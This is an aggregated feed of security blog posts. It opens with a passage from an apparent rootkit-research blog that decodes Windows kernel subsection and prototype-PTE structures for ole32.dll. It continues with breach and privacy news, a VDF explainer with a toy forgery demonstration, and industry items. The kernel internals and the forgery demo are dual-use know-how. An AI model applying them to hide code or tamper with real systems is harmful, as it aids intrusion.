  Flags              31  Sector Offset          0  Protection           3

Subsection 3 @ 817ab888
  ControlArea  817ab818  Starting Sector      8fa  Number Of Sectors   30
  Base Pte     e172ef58  Ptes In Subsect        6  Unused Ptes          0
  Flags              31  Sector Offset          0  Protection           3

Subsection 4 @ 817ab8a8
  ControlArea  817ab818  Starting Sector      92a  Number Of Sectors   33
  Base Pte     e172ef70  Ptes In Subsect        7  Unused Ptes          0
  Flags              51  Sector Offset          0  Protection           5

Subsection 5 @ 817ab8c8
  ControlArea  817ab818  Starting Sector      95d  Number Of Sectors    c
  Base Pte     e172ef8c  Ptes In Subsect        2  Unused Ptes          0
  Flags              11  Sector Offset          0  Protection           1

Subsection 6 @ 817ab8e8
  ControlArea  817ab818  Starting Sector      969  Number Of Sectors   69
  Base Pte     e172ef94  Ptes In Subsect        e  Unused Ptes          0
  Flags              11  Sector Offset          0  Protection           1

It is convenient to present the results in a table. Using PETools, we can see that ole32 contains five sections, and the first subsection is reserved for the header.
  • Subsections 2 and 3, which map the PE sections .text and .orpc, are executable (protection 3, MM_EXECUTE_READ), i.e. their PPTEs address code pages. The fourth subsection belongs to global data and has copy-on-write protection (5, MM_WRITECOPY). The others are read-only (1, MM_READONLY).
  • The second subsection describes the first PE section, which holds executable code. It begins at the second sector (raw offset 0x400 / SECTOR_SIZE == 2). The section's VirtualSize is 0x11ef5e; rounded up to a page multiple, 0x11ef5e + 0xA2 = 0x11F000, and 0x11F000 / PAGE_SIZE = 0x11F is the number of PTEs in the subsection. The raw size in the header is 0x11f000, and 0x11f000 / 0x200 = 0x8F8 is the number of sectors in the subsection.
  • The third subsection also contains executable code and begins at sector 0x11F400 / 0x200 = 0x8FA. Its size is 0x6000 (here we take the raw size, because it is larger than the virtual size), i.e. 0x6000 / 0x1000 = 6 PTEs.
  • The fourth begins at 0x125400 / 0x200 = 0x92A, size 0x7000 / 0x1000 = 7 PTEs.
  • The fifth: 0x12BA00 / 0x200 = 0x95D, size 0x2000 / 0x1000 = 2 PTEs.
  • The sixth: 0x12D200 / 0x200 = 0x969, 0xE000 / 0x1000 = 0xE PTEs.
As a final step, let's check the formula above in practice. Take the 3rd subsection, which describes the ole32.dll section starting at sector offset 0x8fa.

> dt _subsection 817ab888 SubsectionBase
nt!_SUBSECTION
   +0x010 SubsectionBase : 0xe172ef58 _MMPTE

Get the content of the first PTE that describes this section.

0: kd> dd 0xe172ef58 l1
e172ef58  0c779121

It is valid, so:

0: kd> !pfn c779
    PFN 0000C779 at address 8112B358
    flink       000006E7  blink / share count 00000007  pteaddress E172EF58
    reference count 0001   Cached     color 0
    restore pte 862A8C62  containing page        00B8A9  Active      P      
      Shared        

Splitting 862A8C62 into its bit fields: 1 00001100010101010001 1 00011 0001 0.
Concatenating the 20-bit and 4-bit address fields gives 000011000101010100010001 = 0xC5511, and 0xC5511 * 8 + 0x81181000 = 0x817AB888, which is the address of our subsection.

Now, using the pointer to the PPTE, get the file offset it describes with the help of the formula:
((((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12) + Subsection->StartingSector * SECTOR_SIZE
(0xE172EF58 - 0xE172EF58) / 4 = 0, and (0 << 12) + 0x8fa * 0x200 = 0x11F400, which we can find in our table above.
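The table and the formula above can be checked mechanically. The following is an added example (not code from the original post) that encodes the ole32.dll subsection table from this dump and maps a prototype PTE address back to the file offset it backs; the bases of subsections 2 and 4, which the excerpt does not print, are derived from the contiguity of the prototype PTE array, and the prototype-PTE bit split follows the post's own decoding of 862A8C62 rather than a documented _MMPTE layout.

```python
from collections import namedtuple

# Added example, not code from the original post: locate the subsection that
# owns a prototype PTE (PPTE) and map it back to the file offset it backs,
# using the post's formula
#   offset = ((Pte - SubsectionBase) / sizeof(PTE)) << 12  +  StartingSector * SECTOR_SIZE
# over the ole32.dll subsection table worked out above.
PTE_SIZE = 4            # x86 without PAE, as in the dump
PAGE_SHIFT = 12
SECTOR_SIZE = 0x200

Subsection = namedtuple("Subsection", "number address base ptes starting_sector")

# Values come from the post's table. Subsections 2 and 4 have no "Base Pte"
# line in the excerpt; their bases are derived (assumption) from the prototype
# PTE array being contiguous, which the visible entries confirm:
# 0xE172EF58 + (6 + 7) * 4 == 0xE172EF8C (subsection 5's base).
SUBSECTIONS = [
    Subsection(2, None,       0xE172EF58 - 0x11F * PTE_SIZE, 0x11F, 0x002),
    Subsection(3, 0x817AB888, 0xE172EF58,                    0x006, 0x8FA),
    Subsection(4, None,       0xE172EF58 + 0x006 * PTE_SIZE, 0x007, 0x92A),
    Subsection(5, None,       0xE172EF8C,                    0x002, 0x95D),
    Subsection(6, 0x817AB8E8, 0xE172EF94,                    0x00E, 0x969),
]


def table_is_contiguous(subs=SUBSECTIONS) -> bool:
    """Each subsection's PPTE array must start right after the previous one."""
    for prev, cur in zip(subs, subs[1:]):
        if cur.base != prev.base + prev.ptes * PTE_SIZE:
            return False
    return True


def find_subsection(pte_addr: int, subs=SUBSECTIONS) -> Subsection:
    """Which subsection's PPTE range contains this prototype PTE address?"""
    for sub in subs:
        if sub.base <= pte_addr < sub.base + sub.ptes * PTE_SIZE:
            return sub
    raise ValueError(f"PPTE {pte_addr:#x} is not in any subsection of this file")


def file_offset(pte_addr: int, subs=SUBSECTIONS) -> int:
    """File offset backing the page described by the PPTE at pte_addr."""
    sub = find_subsection(pte_addr, subs)
    index = (pte_addr - sub.base) // PTE_SIZE      # page number within the subsection
    return (index << PAGE_SHIFT) + sub.starting_sector * SECTOR_SIZE


def subsection_from_proto_pte(restore_pte: int, pool_base: int = 0x81181000) -> int:
    """Recover the _SUBSECTION address from a prototype PTE value the way the
    post decodes 862A8C62: bits 30..11 and bits 4..1 concatenate to a 24-bit
    index, scaled by 8 and added to the base the post uses (0x81181000 in that
    dump). The bit split and the base are taken from the post's worked
    decoding, not from a documented _MMPTE definition (assumption)."""
    high = (restore_pte >> 11) & 0xFFFFF   # 20-bit field
    low = (restore_pte >> 1) & 0xF         # 4-bit field
    return pool_base + ((high << 4) | low) * 8


if __name__ == "__main__":
    pte = 0xE172EF58                       # first PPTE of subsection 3
    print(f"PPTE {pte:#x} -> file offset {file_offset(pte):#x}")
    print(f"restore pte 862A8C62 -> subsection @ {subsection_from_proto_pte(0x862A8C62):#x}")
```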


A blog about rootkits research and the Windows kernel

E Hacking News – Latest Hacker News and IT Security News: Hackers Accessed Personal Details of 29M Facebook Users



Facebook, still recovering from the Cambridge Analytica affair, has become extraordinarily sensitive to data breaches, and it now says attackers accessed the contact details of 29 million users — encompassing broad spheres of information, from phone numbers and email addresses to more intimate details like check-ins and recent searches. The mass data breach came as a lasting bruise to the largest social network's credibility and deep-rooted user trust.

According to Friday's statement, the attackers illegally acquired access tokens for 30 million accounts, which gave them full access to those profiles, from which they extracted basic contact information (name and phone number/email address). More detailed information, such as hometown, location, birthdate, gender and recently checked-in places, was extracted for 14 million accounts.
The remaining one million accounts, though affected, were not subjected to any information extraction.

Responding to the security breach, Facebook pledged to send customized messages to the 30 million users whose accounts fell prey to what it has labeled a "fairly broad" breach. Reportedly, despite its magnitude, the breach spared the third-party apps linked to users' Facebook accounts, as Facebook said no data was accessed from third-party apps — WhatsApp, Instagram or Messenger included.

Facebook's ongoing investigation implies that the company is not ruling out the possibility of less destructive but more oblique attacks that use a similar mechanism. Aside from that, the hackers used an automated program to move through accounts and extract the data rapidly, but notably, they did not perform any other activity while they were logged in.

Facebook's Vice President of product management, Guy Rosen, said in a call with reporters, "We take these incidents really, really seriously."

Facebook said the FBI is investigating the hack, but has refused to disclose further details — the perpetrators behind the attack, to be precise. Facebook will not disclose a breakdown of the affected users by location, a company executive said on a conference call.

A Reddit user's take on the probable horrors of the breach reflects the concern of panicked users; apple-hacck writes,

 “many people use the same passwords across accounts (my first thought). But in the case of a Facebook data breach, since the personal details were accessed, they can commit identity fraud because they have your face (if you have a profile picture), phone number (because many people link their numbers to Facebook), and your name. All of which can be used to convince a bank or other institution that it is you trying to access the account.”


In the wake of the exacerbated concerns, Patrick Moorhead, founder of Moor Insights & Strategy, says, “Facebook should provide all those customers free credit monitoring to make sure the damage is minimized.”


E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: A Proposed Amendment to the Chicago Municipal Code That Could Invade Biometric and Location Privacy



As the use of facial recognition software in the private sector grows aggressively and exponentially, a proposed amendment to the Chicago municipal code would enable organizations to use this facial recognition technology, according to the Electronic Frontier Foundation (EFF).

The EFF goes on to state that this law would also disregard the Illinois Biometric Information Act (BIPA), adding that it could "invade biometric and location privacy, and violate a pioneering state privacy law adopted by Illinois a decade ago."

EFF went ahead to add -

"At its core, facial recognition technology is an extraordinary menace to our digital liberties. Unchecked, the expanding proliferation of surveillance cameras, coupled with constant improvements in facial recognition technology, can create a surveillance infrastructure that the government and big companies can use to track everywhere we go in public places, including who we are with and what we are doing.
This system will deter law-abiding people from exercising their First Amendment rights in public places. Given continued inaccuracies in facial recognition systems, many people will be falsely identified as dangerous or wanted on warrants, which will subject them to unwanted—and often dangerous—interactions with law enforcement. This system will disparately burden people of colour, who suffer a higher 'false positive' rate due to additional flaws in these emerging systems."

The proposal seeks to add a "Face Geometry Data" section to the city's municipal code, which would enable organizations to use the controversial face surveillance systems under licensing agreements with the Chicago Police Department.

The law basically requires organizations to obtain informed, opt-in consent from people before collecting biometric data from them or disclosing it to a third party, to store the biometric data securely, and to observe a three-year limit on retention of the acquired data, after which it must be deleted.

The EFF has likewise opposed the FBI's accumulation of colossal databases of biometric information on Americans. The Next Generation Identification (NGI) system incorporates fingerprints, face recognition, iris scans and palm prints. The data is collected during arrests and in non-criminal cases, for example immigration, identity verification or background checks, and state licensing.

Regardless of the huge potential that facial recognition and biometric technology in general hold for increased welfare, national security and advances in cyber security, many have cautioned that the technology should be improved before its continued use, before something extreme affects users.



E Hacking News - Latest Hacker News and IT Security News

SolarWinds MSP Blog: The ingredients of a nutritious security burrito

Years ago, antivirus (AV) was often considered the backbone of cybersecurity. Many IT professionals figured AV was enough to prevent their users from falling victim to a cyberattack. 

However, the industry has now shifted to a “defense-in-depth” model, otherwise known as “layered security.” We realized that AV wasn’t enough. Patch management alone wasn’t enough. Businesses had to start combining several layers of defense to combat cybercriminals.


SolarWinds MSP Blog

Blog | Avast EN: Google+ ending and CA is no state for weak passwords | Avast

Google+ to go offline after security breach discovered

Following an exposé by WSJ that revealed Google had kept a huge bug in their Google+ social network under wraps, the search giant has decided to shut it down by late 2019. The bug might have enabled malicious apps to extract profile data such as name, gender, email address, occupation, and age. To make matters worse, Google isn’t sure how many profiles could have been compromised as they only keep log data for two weeks.



Blog | Avast EN

Trail of Bits Blog: Introduction to Verifiable Delay Functions (VDFs)

Finding randomness on the blockchain is hard. A classic mistake developers make when trying to acquire a random value on-chain is to use quantities like future block hashes, block difficulty, or timestamps. The problem with these schemes is that they are vulnerable to manipulation by miners. For example, suppose we are trying to run an on-chain lottery where users guess whether the hash of the next block will be even or odd. A miner then could bet that the outcome is even, and if the next block they mine is odd, discard it. Here, tossing out the odd block slightly increases the miner’s probability of winning the lottery. There are many real-world examples of “randomness” being generated via block variables, but they all suffer from the unavoidable problem that it is computationally easy for observers to determine how choices they make will affect the randomness generated on-chain.

Another related problem is electing leaders and validators in proof of stake protocols. In this case it turns out that being able to influence or predict randomness allows a miner to affect when they will be chosen to mine a block. There are a wide variety of techniques for overcoming this issue, such as Ouroboros’s verifiable secret-sharing scheme. However, they all suffer from the same pitfall: a non-colluding honest majority must be present.

In both of the above scenarios it is easy for attackers to see how different inputs affect the result of a pseudorandom number generator. This led Boneh, et al. to define verifiable delay functions (VDFs). VDFs are functions that require a moderate amount of sequential computation to evaluate, but once a solution is found, it is easy for anyone to verify that it is correct. Think of VDFs as a time delay imposed on the output of some pseudorandom generator. This delay prevents malicious actors from influencing the output of the pseudorandom generator, since all inputs will be finalized before anyone can finish computing the VDF.

When used for leader selection, VDFs offer a substantial improvement over verifiable random functions. Instead of requiring a non-colluding honest majority, VDF-based leader selection only requires the presence of any honest participant. This added robustness is due to the fact that no amount of parallelism will speed up the VDF, and any non-malicious actor can easily verify anyone else's claimed VDF output is accurate.

VDF Definitions

Given a delay time t, a verifiable delay function f must be both

  1. Sequential: anyone can compute f(x) in t sequential steps, but no adversary with a large number of processors can distinguish the output of f(x) from random in significantly fewer steps
  2. Efficiently verifiable: Given the output y, any observer can verify that y = f(x) in a short amount of time (specifically log(t)).

In other words, a VDF is a function which takes exponentially more time to compute (even on a highly parallel processor) than it does to verify on a single processor. Also, the probability of a verifier accepting a false VDF output must be extremely small (chosen by a security parameter λ during initialization). The condition that no one can distinguish the output of f(x) from random until the final result is reached is essential. Suppose we are running a lottery where users submit 16-bit integers and the winning number is determined by giving a seed to a VDF that takes 20 min to compute. If an adversary can learn 4 bits of the VDF output after only 1 min of VDF computation, then they might be able to alter their submission and boost their chance of success by a factor of 16!

Before jumping into VDF constructions, let’s examine why an “obvious” but incorrect approach to this problem fails. One such approach would be repeated hashing. If the computation of some hash function h takes t steps to compute, then using f = h(h(...h(x))) as a VDF would certainly satisfy the sequential requirement above. Indeed, it would be impossible to speed this computation up with parallelism since each application of the hash depends entirely on the output of the previous one. However, this does not satisfy the efficiently verifiable requirement of a VDF. Anyone trying to verify that f(x) = y would have to recompute the entire hash chain. We need the evaluation of our VDF to take exponentially more time to compute than to verify.

VDF Candidates

There are currently three candidate constructions that satisfy the VDF requirements. Each one has its own potential downsides. The first was outlined in the original VDF paper by Boneh, et al. and uses injective rational maps. However, evaluating this VDF requires a somewhat large amount of parallel processing, leading the authors to refer to it as a “weak VDF.” Later, Pietrzak and Wesolowski independently arrived at extremely similar constructions based on repeated squaring in groups of unknown order. At a high level, here’s how the Pietrzak scheme works.

  1. To set up the VDF, choose a time parameter T, a finite abelian group G of unknown order, and a hash function H from bytes to elements of G.
  2. Given an input x, let g = H(x) and evaluate the VDF by computing $y = g^{2^T}$.

The repeated squaring computation is not parallelizable and reveals nothing about the end result until the last squaring. These properties are both due to the fact that we do not know the order of G. That knowledge would allow attackers to use group theory based attacks to speed up the computation.

Now, suppose someone asserts that the output of the VDF is some number z (which may or may not be equal to y). This is equivalent to showing that $z = v^{2^{T/2}}$ and $v = g^{2^{T/2}}$. Since both of the previous equations have the same exponent, they can be verified simultaneously by checking a random linear combination, e.g., $v^r z = (g^r v)^{2^{T/2}}$, for a random r in $\{1, \ldots, 2^\lambda\}$ (where λ is the security parameter). More formally, the prover and verifier perform the following interactive proof scheme:

  1. The prover computes $v = g^{2^{T/2}}$ and sends v to the verifier
  2. The verifier sends a random r in $\{1, \ldots, 2^\lambda\}$ to the prover
  3. Both the prover and verifier compute $g_1 = g^r v$ and $z_1 = v^r z$
  4. The prover and verifier recursively prove that $z_1 = g_1^{2^{T/2}}$

The above scheme can be made non-interactive using a technique called the Fiat-Shamir heuristic. Here, the prover generates a challenge r at each level of the recursion by hashing (G, g, z, T, v) and appending v to the proof. In this scenario the proof contains $\log_2 T$ elements and requires approximately $(1 + 2/\sqrt{T})\,T$.

Security Analysis of Pietrzak Scheme

The security of Pietrzak's scheme relies on the security of the low order assumption: it is computationally infeasible for an adversary to find an element of low order in the group being used by the VDF. To see why finding an element of low order breaks the scheme, first assume that a malicious prover Eve found some element m of small order d. Then Eve sends $z m$ to the verifier (where z is the valid output). The invalid output will be accepted with probability 1/d since

  1. When computing the second step of the recursion, we will have the base element $g_1 = g^r v$, where $v = g^{2^{T/2}} m$, and need to show that $g_1^{2^{T/2}} = v^r (z m)$
  2. The m term on the left hand side is $m^{2^{T/2}}$
  3. The m term on the right hand side is $m^{r+1}$
  4. Since m has order d, these two will be equal when $r + 1 \equiv 2^{T/2} \pmod d$, which happens with probability 1/d

To see a full proof of why the low order assumption is both necessary and sufficient to show Pietrzak’s scheme is sound, see Boneh’s survey of recent VDF constructions.

The security analysis assumes that one can easily generate a group of unknown order that satisfies the low order assumption. We will see below that there are not groups currently known to satisfy these constraints that are amenable to a trustless setup, i.e., a setup where there is no party who can subvert the VDF protocol.

For example, let's try to use everyone's favorite family of groups: the integers modulo the product of two large primes (RSA groups). These groups have unknown order, since finding the order requires factoring a large integer. However, they do not satisfy the low order assumption. Indeed, the element -1 is always of order 2. This situation can be remedied by taking the quotient of an RSA group G by the subgroup {1,-1}. In fact, if the modulus of G is a product of strong primes (primes such that (p-1)/2 is also prime), then after taking the aforementioned quotient there are no elements of low order other than 1.

This analysis implies that RSA groups are secure for Pietrzak's VDF, but there's a problem. To generate an RSA group, someone has to know the factorization of the modulus N. Devising a trustless RSA group selection protocol, where no one knows the factorization of the modulus N, is therefore an interesting and important open problem in this area.

Another avenue of work towards instantiating Pietrzak’s scheme involves using the class group of an imaginary quadratic number field. This family of groups does not suffer from the above issue where selection requires a trusted third party. Simply choosing a large negative prime (with several caveats) will generate a group whose order is computationally infeasible to determine even for the person who chose the prime. However, unlike RSA groups, the difficulty of finding low-order elements in class groups of quadratic number fields is not well studied and would require more investigation before any such scheme could be used.
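The Pietrzak scheme above, made non-interactive with Fiat-Shamir, together with the -1 low-order forgery from the security analysis, as an added example that is not code from the Trail of Bits post or any VDF project; it assumes a constructed toy RSA modulus (whose order is of course not unknown) and a SHA-256-based hash-to-group and challenge derivation chosen for the example.

```python
import hashlib

# Added example, not code from the Trail of Bits post, Chia or any VDF library:
# Pietrzak's repeated-squaring VDF with the halving proof made non-interactive
# by Fiat-Shamir. The group is a CONSTRUCTED toy RSA group so the example runs
# in milliseconds; a real deployment needs a ~2048-bit modulus whose
# factorisation nobody knows, and the quotient by {1, -1} discussed above.
P, Q = 1_000_003, 1_000_033   # constructed small primes (demo only: the order is NOT unknown)
N = P * Q                     # Z_N^*, the "RSA group"
T = 2 ** 10                   # time parameter; a power of two keeps T/2 integral
LAMBDA = 128                  # security parameter: challenges r lie in [1, 2^λ]


def hash_to_group(x: bytes) -> int:
    """H: bytes -> G, mapping the VDF input to a non-zero element of Z_N."""
    return 1 + int.from_bytes(hashlib.sha256(x).digest(), "big") % (N - 1)


def evaluate(g: int, t: int = T) -> int:
    """y = g^(2^t) mod N by t sequential squarings: the slow, non-parallel part."""
    y = g
    for _ in range(t):
        y = y * y % N
    return y


def challenge(g: int, z: int, t: int, v: int) -> int:
    """Fiat-Shamir: r in [1, 2^λ] derived by hashing (G, g, z, T, v)."""
    data = b"|".join(str(n).encode() for n in (N, g, z, t, v))
    return 1 + int.from_bytes(hashlib.sha256(data).digest(), "big") % (2 ** LAMBDA)


def fold(g: int, z: int, t: int, v: int):
    """One halving step shared by prover and verifier: g1 = g^r v, z1 = v^r z,
    turning the claim z = g^(2^t) into the claim z1 = g1^(2^(t/2))."""
    r = challenge(g, z, t, v)
    return pow(g, r, N) * v % N, pow(v, r, N) * z % N, t // 2


def prove(g: int, z: int, t: int = T, tamper: int = 1) -> list:
    """Return the log2(t) midpoints v = g^(2^(t/2)) that prove z = g^(2^t).
    'tamper' multiplies the first midpoint by a chosen element (1 = honest
    prover); it is used below to reproduce the low-order-element analysis."""
    proof = []
    while t > 1:
        v = pow(g, 2 ** (t // 2), N) * tamper % N
        tamper = 1
        proof.append(v)
        g, z, t = fold(g, z, t, v)
    return proof


def verify(g: int, z: int, proof: list, t: int = T) -> bool:
    """log2(t) folds plus one squaring, instead of t squarings."""
    for v in proof:
        if t <= 1:
            return False
        g, z, t = fold(g, z, t, v)
    return t == 1 and z == g * g % N


def minus_one_forgery_accepted(x: bytes) -> bool:
    """Eve uses m = -1, which has order 2 in Z_N^*: she claims z' = -y and
    sends v' = -v at the first level. After folding, the m terms are
    m^(2^(T/2)) = 1 on the left and m^(r+1) on the right, so the forged
    proof verifies exactly when the challenge r is odd."""
    g = hash_to_group(x)
    z_forged = (N - 1) * evaluate(g) % N
    proof = prove(g, z_forged, tamper=N - 1)
    return verify(g, z_forged, proof)


def forgery_acceptance_rate(trials: int = 200) -> float:
    """Fraction of constructed seeds for which the -1 forgery is accepted (~1/2)."""
    hits = sum(minus_one_forgery_accepted(f"seed-{i}".encode()) for i in range(trials))
    return hits / trials


if __name__ == "__main__":
    g = hash_to_group(b"lottery-seed")
    y = evaluate(g)
    print("honest proof verifies:", verify(g, y, prove(g, y)))
    print("-1 forgery accepted for", forgery_acceptance_rate(), "of seeds")
```

Because this group is not quotiented by {1,-1}, the -1 forgery is accepted for about half of the seeds, the 1/d = 1/2 of the analysis above; representing every element by min(a, N-a) is what removes that element of order 2.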

State of VDFs and Open Problems

As mentioned in the previous section, both the Pietrzak and Wesolowski schemes rely on generating a group of unknown order. Doing so without a trusted party is difficult in the case of RSA groups, but class groups seem to be a somewhat promising avenue of work. Furthermore, the Wesolowski scheme assumes the existence of groups that satisfy something called the adaptive root assumption, which is not well studied in the mathematical literature. There are many other open problems in this area, including constructing quantum resistant VDFs, and the potential for ASICs to ruin the security guarantees of VDF constructions in practice.

As for industry adoption of VDFs, several companies in the blockchain space are trying to use VDFs for consensus algorithms. Chia, for example, uses the repeated squaring technique outlined above, and is currently running a competition for the fastest implementation of this scheme. The Ethereum Foundation also appears to be developing a pseudorandom number generator that combines RANDAO with VDFs. While both are very exciting projects that will be hugely beneficial to the blockchain community, this remains a very young area of research. Take any claim of security with a grain of salt.





Trail of Bits Blog

[Untitled]: Why IT is paying attention to "zero trust"

SOCs buried in complex environments are now looking eagerly at integrated solutions that deliver real power for strengthening security.

As pointed out in an earlier article on this blog, now that cloud and mobile have become mainstream, the boundary of security has become blurred.

Protecting corporate information cannot rely on the firewall alone. Far too much data is in flight, and the amount of data travelling to and from the cloud has become almost equal to the amount that stays inside the firewall. That is why companies are emphasizing a multi-faceted approach in preparation for attacks launched from many different paths.



[Untitled]

Securosis Blog: Disrupt:Ops: What Security Managers Need to Know About Amazon S3 Exposures (1/2)


As we spin up Disrupt:OPS we are beginning to post cloud-specific content over there, mixing theory with practical how-to guidance. Not to worry! We have plenty of content still planned for Securosis. But we haven’t added any staff at Securosis so there is only so much we can write. In the meantime, linking to non-product posts from Securosis should help ensure you don’t lose sleep over missing even a single cloud-related blog entry.

So here’s #1 from the Disrupt:Ops hit parade!

What Security Managers Need to Know About Amazon S3 Exposures (1/2)

The accidental (or deliberate) exposure of sensitive data on Amazon S3 is one of those deceptively complex issues. On the surface it seems entirely simple to avoid, yet despite wide awareness we see a constant stream of public exposures and embarrassments, combined with a healthy dollop of misunderstanding and victim blaming.

- Rich

Securosis Blog

E Hacking News – Latest Hacker News and IT Security News: Whatsapp Fixes Video Call Triggered Exploit which Allowed Accounts Intrusion



A potentially serious flaw that put users in a vulnerable position during video calls on WhatsApp has been fixed by the service provider.

The bug allowed attackers to hijack the app, and subsequently the accounts of users, on both iOS and Android. It left them defenceless against the attack as soon as they answered a call.

When an attacker transmits a malformed RTP packet to a potential victim, heap corruption could occur, according to a bug report by Natalie Silvanovich, a security researcher with Google's Project Zero security research team.

Dissecting the issue, Natalie says in the bug report, "Heap corruption can occur when the WhatsApp mobile application receives a malformed RTP packet." She adds, "This issue can occur when a WhatsApp user accepts a call from a malicious peer. It affects both the Android and iPhone clients."

As RTP, which stands for Real-time Transport Protocol, is used by both the iOS and Android versions of the messaging app, both platforms were vulnerable to the hijack, whereas WhatsApp Web does not succumb to the attack because it uses WebRTC for video calls.

Notably, Silvanovich spotted the vulnerability a month earlier, but it came into the public domain only once a fix had been devised. The flaws were patched on October 3rd and September 28th for iOS and Android respectively.
Now that the bug has been fixed, to be on an even safer side users are advised to update their apps to the latest version available for iOS and Android.




E Hacking News - Latest Hacker News and IT Security News

Professionally Evil Insights: Not Just Another Notch in Your Belt: Organizational Challenges of PCI Compliance

As an account manager in the world of security, I am constantly confronted with questions surrounding PCI compliance and the challenges organizations face with ensuring proper controls are in place, and all requirements met.  If we get down to the core of the issue, the reality is many organizations either don’t have the budget or resources to build out a mature security program that meets PCI DSS standards, or they don’t care enough about addressing security concerns until something bad happens.  Oftentimes, that something bad ends up being catastrophic to the business, and we, as an industry, tend to be too reactive when we should be getting out in front of these issues.

PCI DSS was created in an effort to motivate organizations to work toward creating a more secure payment process to thwart attacks from unauthorized users.  From the actual debit/credit transaction, to the storing of card data and everything in between, PCI was supposed to be the driving force behind businesses becoming more proactive and vigilant, but almost 15 years later, far too many organizations are still falling short.  

Contrary to popular belief, working toward PCI compliance is not simply a matter of checking a box or adding another notch in your belt; it’s an ongoing process, and while it can be challenging, your business will be better off for taking the necessary steps in doing so.  Secure Ideas works tirelessly to assist organizations in better understanding what is required of them, what steps are needed to reach PCI DSS compliance, and, through a collaborative approach based on years of experience, how to become more resilient to attacks.

Because PCI DSS is not law, the only way to truly compel organizations to work toward compliance is to levy punitive fines or take away the ability to accept cards for those that refuse to comply.  Until recently, the potential for fines wasn’t much of a concern for organizations, and the inconvenience of dealing with PCI was enough for many organizations to ignore it entirely. Fortunately, we’re now at a point that fines are being assessed with more frequency, and failing to comply will soon be too much of a cost to disregard, thus motivating organizations to address their shortcomings.   

While we can sift through the extensive list of controls and requirements that are clearly outlined, if organizations are actively trying to sidestep PCI DSS rather than adhere to or work toward compliance, then we’re not addressing the issue at hand and that is a blatant disregard for proper security controls.  Secure Ideas can help navigate your business through the requirements of PCI, but the burden rests on the shoulders of those same organizations to not only reach but exceed the bare minimum.

At the end of the day, the goal is keeping sensitive data out of the hands of malicious persons, and with new technology and things changing daily, we must be more vigilant than ever.  Secure Ideas recognizes the challenges of attaining compliance, and that is why we work hand in hand with clients to fully understand the requirements of PCI DSS, and how it benefits an organization to comply.



Professionally Evil Insights

Bro Blog: Renaming the Bro Project

More than 20 years ago I chose the name "Bro" as "an Orwellian reminder that monitoring comes hand in hand with the potential for privacy violations", as the original Bro paper put it. Today that warning is needed more than ever ... but it's clear that now the name "Bro" is alas much more of a distraction than a reminder.

On the Leadership Team of the Bro Project, we heard clear concerns from the Bro community that the name "Bro" has taken on strongly negative connotations, such as "Bro culture". These send a sharp, anti-inclusive - and wholly unintended and undesirable - message to those who might use Bro. The problems were significant enough that during BroCon community sessions, several people have mentioned substantial difficulties in getting their upper management to even consider using open-source software with such a seemingly ill-chosen, off-putting name.

Accordingly, in 2017 the Leadership Team undertook to find a new name for the project. We solicited suggestions for new names from the Bro community, receiving several hundred that covered a wide range of sensibilities and rationales. The LT extensively discussed the candidates internally but was unable to come close to a consensus on a satisfactory choice. Names that some LT members quite liked, others found quite deficient. This process proved particularly hard because some well-liked names had trademark issues and such.

Given that impasse, the LT engaged with a professional naming/branding consultancy to identify other possible names. The process elicited reflection on just what we would like the name to convey, which included notions of insight/visibility, soundness, flexibility, and Bro's heritage.

As the process proceeded, a number of LT members identified their fondness for quirky, pithy names for open-source projects. One name in particular dates all the way back to the very beginning of Bro in 1995 at the Lawrence Berkeley National Laboratory: Zeek. At LBL, the production Bro monitoring ran as a pseudo-user named "zeek" - this included both running the Bro process itself, and also the batch jobs and parallel tcpdump captures used to ensure robust 24x7 operation - a usage that continued for decades.

Why Zeek? The name was inspired by Gary Larson's use of Zeek characters in various "The Far Side" cartoons. We were big Far Side fans at LBL!

As Bro's originator, I have to say that I find switching the system's name to Zeek not only timely, but - in its quirkiness and history - endearing. I am thrilled that the Leadership Team identified and subsequently strongly backed the choice. (It was great, too, to find that we could secure the domain zeek.org.)

The name "Bro" offered numerous opportunities for modest-but-memorable wordplay, such as referring to the project's "Broadmap", beginning conferences with a "Broverview", and coining the term "brogrammer". We've only begun exploring the possibilities with Zeek. However, the speed with which we readily found our first slogan holds promise in this regard. In looking for a new name, we had particularly identified wanting to find one that underscores the system's ability to provide deep insight into network traffic. We put that goal aside for our final selection. But shortly after we settled on our choice, a project member offered:

Zeek, and ye shall find!

Bro Blog

liquid thoughts: Tools For Thought. The Torch (Panel Intro Proposal 11 Oct)

Proposal for introduction to a panel discussion on the 9th of December to celebrate Doug Engelbart’s Demo’s 50th anniversary. This introduction would be shared with the panelists beforehand so that they could have pre-thought-through and written 1 min notes:

Our dear friend Doug’s passion was to augment how we solve urgent problems together.

augmentation

In order to do this he had the great early insight that we should use computers to their full extent because computers allow us to manipulate symbols. This was a great insight, and it was made even more powerful by his paradigm, the way he looked at it: Not simply passive and easy to use, not as AI constructs to do our work for us, but to augment our intellect and the way we work together.

shining a light on the future

He did not think that any one person or group could ever design the ultimate augmentation system. The man who practically invented all of the computer interactions we use today was well aware of his own lack of vision. This is extraordinary.

He used the illustration of shining a torch into the distance. He thought we should build the most powerful torch to see as far as we could, that is to say, we should build the most powerful augmentation systems we could, and then we should use them to see how they really work, really live in them, and use that experience to build yet more powerful systems.

Systems to augment our ability to solve urgent, complex problems collectively–to build systems to enable a deeper literacy, a deeper engagement with our knowledge–and with each other.

This is not an engineering problem. This is a whole–humanity problem.

first half

I ask the panel here today to start with a 1 min intro of something they feel we can power our torch with right now; what are the easy, low hanging fruit (to mix metaphors)? What can be done with relatively little time and money to increase the power of the knowledge worker–a term once remote and fancy and which now covers basically everyone?

second half

At the half way mark I will ask us to consider the distant future. If we agree on a goal of truly augmenting humanity to have rich and powerful interactions (which we do, since we have been in discussion before this panel), what kind of tools should we aim to build, and more importantly, how should we go about building them and what infrastructures will need to be created to support them?



liquid thoughts

E Hacking News – Latest Hacker News and IT Security News: BrahMos Breach With Coded Games: Dispatching Sensitive Information Across The Border?


Recently, an aerospace engineer, Nishant Agrawal was taken to be responsible for the leakage of majorly sensitive information. Apparently, the harvested information was meant for some Pakistani based operators.

The National Institute of Technology’s former student who also worked as a research intern in IIT Roorkee initially, according to Anti-Terrorism Squad, was contacted by two women who pretended to offer him a job in Canada and a handsome salary and ever since then he had been on terms with them.  The IP addresses and accounts were confirmed as that from Pakistan. The matter is still being investigated and concrete statements can’t be made as of now.

